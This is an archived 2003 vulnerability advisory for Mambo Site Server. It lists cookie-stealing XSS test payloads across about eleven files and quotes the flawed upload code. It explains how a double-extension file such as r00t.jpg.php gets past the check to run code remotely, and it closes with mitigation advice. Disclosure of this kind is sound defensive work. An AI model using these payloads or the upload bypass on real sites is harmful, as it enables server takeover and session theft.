Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: General :: sb5925.htm

Mambo Site Server Remote Code Execution



12th Jan 2003 [SBWID-5925]
COMMAND

	Mambo Site Server Remote Code Execution

SYSTEMS AFFECTED

	Mambo 4.0.12 BETA and Prior

PROBLEM

	Mindwarper [mindwarper@hush.com] found :
	
	Mambo Site Server is a website portal tool written in php. A  couple  of
	vulnerabilies  have  been  discovered  including  XSS  and  Remote  Code
	Execution on the server with server permissions. A  couple  of  includes
	and upload  codes  do  not  check  for  admin  access  or  any  type  of
	restriction  and  allow  attackers  to  run   arbitrary   code   without
	permission.
	
	- ----------------------
	Vulnerability:
	- ----------------------
	
	1. XSS exist in the following files and possibly in a couple more.
	
		administrator/popups/sectionswindow.php (type=web&link="<script>alert(document.cookie)</script>
	
		administrator/gallery/gallery.php (directory="<script>alert(document.cookie)</script>)
	
		administrator/gallery/navigation.php (directory="<script>alert(document.cookie)</script>)
	
		administrator/gallery/uploadimage.php (directory="<script>alert(document.cookie)</script>)
	
		administrator/gallery/view.php (path="<script>alert(document.cookie)</script>)
	
		administrator/upload.php (newbanner=1&choice="<script>alert(document.cookie)</script>)
	
		themes/mambosimple.php (detection=detected&sitename=</title><script>alert(document.cookie)</script>)
	
		upload.php (type="<script>alert(document.cookie)</script>)
	
		emailfriend/emailarticle.php (id="<script>alert(document.cookie)</script>)
	
		emailfriend/emailfaq.php (id="<script>alert(document.cookie)</script>)
	
		emailfriend/emailnews.php (id="<script>alert(document.cookie)</script>)
	
	
	2. Remote Arbitrary  Code  Execution  is  found  in  the  gallery  image
	uploader under administrator directory.
	
		administrator/gallery/uploadimage.php
	
		(these are also exploitable:  upload.php and administrator/upload.php)
	
	Apparantly, this file allows  any  remote  and  local  users  to  upload
	'images'  to  the  server  without  checking  for  any  permissions.  By
	tricking the badly written file extension security  check,  an  attacker
	can upload any type of arbitrary files to the server.
	
	
	- ----------------------
	Exploit:
	- ----------------------
	
	The following code can be found inside uploadimage.php file.
	
	
	**********************************************************************
	
	
	..
	
	if (isset($fileupload)){
		if ($directory!="uploadfiles"){
			$base_Dir = "../../images/stories/";
		}else{
			$base_Dir = "../../uploadfiles/$Itemid/";
		}
	
		$filename = split("\.", $userfile_name);
		if (eregi("[^0-9a-zA-Z_]", $filename[0])){
			print "<SCRIPT> alert('File must only contain alphanumeric characters and no spaces please.'); window.history.go(-1);</SCRIPT>\n";
			exit();
		}
	
		if (file_exists($base_Dir.$userfile_name)){
			print "<SCRIPT> alert('Image $userfile_name already exists.'); window.history.go(-1);</SCRIPT>\n";
			exit();
		}
	
		if ((!eregi(".gif", $userfile_name)) && (!eregi(".png", $userfile_name)) && (!eregi(".jpg", $userfile_name)) && (!eregi(".doc", $userfile_name))&& (!eregi(".xls", $userfile_name))&& (!eregi(".swf", $userfile_name)) && (!eregi(".pdf", $userfile_name))){
			print "<SCRIPT>alert('The file must be pdf, gif, png, jpg, doc, xls or swf'); window.history.go(-1);</SCRIPT>\n";
			exit();
		}
	
		if ((eregi(".pdf", $userfile_name)) || (eregi(".doc", $userfile_name)) || (eregi(".xls", $userfile_name))){
			if (!copy($userfile, $pdf_path.$userfile_name)){
				echo "Failed to copy $userfile_name";
			}
		}
		elseif (!copy($userfile, $base_Dir.$userfile_name)){
			echo "Failed to copy $userfile_name";
		}
	
		if (eregi(".jpg", $userfile_name)){
			print "<SCRIPT>top.window.images.document.location.href=\"index.php?gal=0&#8465;=jpg&directory=$directory&Itemid=$Itemid\"</SCRIPT>\n";
		}
		elseif (eregi(".pdf", $userfile_name)){
			print "<SCRIPT>top.window.images.document.location.href='pdf.php'</SCRIPT>\n";
		}
		if (eregi(".png", $userfile_name)){
			print "<SCRIPT>top.window.images.document.location.href=\"index.php?gal=0&#8465;=png&directory=$directory&Itemid=$Itemid\"</SCRIPT>\n";
		}
		else {
			print "<SCRIPT>top.window.images.document.location.href=\"index.php?gal=0&#8465;=gif&directory=$directory&Itemid=$Itemid\"</SCRIPT>\n";
		}
	}
	
	..
	
	
	**********************************************************************
	
	
	First of all
	
	- ---=---
	if (isset($fileupload)){
		if ($directory!="uploadfiles"){
			$base_Dir = "../../images/stories/";
		}else{
			$base_Dir = "../../uploadfiles/$Itemid/";
		}
	- ---=---
	
	Just sets the directory in which the files will be uploaded to.  We  can
	leave both $directory and $fileupload emtpy.
	
	Now lets examine the 'security check' that is included in this code:
	
	- ---=---
	if ((!eregi(".gif", $userfile_name)) && (!eregi(".png", $userfile_name)) && (!eregi(".jpg", $userfile_name)) && (!eregi(".doc", $userfile_name))&& (!eregi(".xls", $userfile_name))&& (!eregi(".swf", $userfile_name)) && (!eregi(".pdf", $userfile_name))){
	- ---=---
	
	As you can or cannot see,  the  function  eregi()  only  checks  if  the
	'.ext' are located inside the string $userfile_name, but does not  check
	if they end with that extention. The attacker can just rename  his  file
	to r00t.jpg.php and upload without any warnings.
	
	After uploading the  arbitrary  file  successfully,  the  attacker  just
	needs to activate his code by calling  /images/stories/r00t.jpg.php  and
	he's got remote access to the server with server permissions.

SOLUTION

	None yet, check [http://www.mamboserver.com]
	
	Meanwhile you should remove the following files from your server:
	
	 upload.php
	 administrator/upload.php
	 administrator/gallery/uploadimage.php
	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH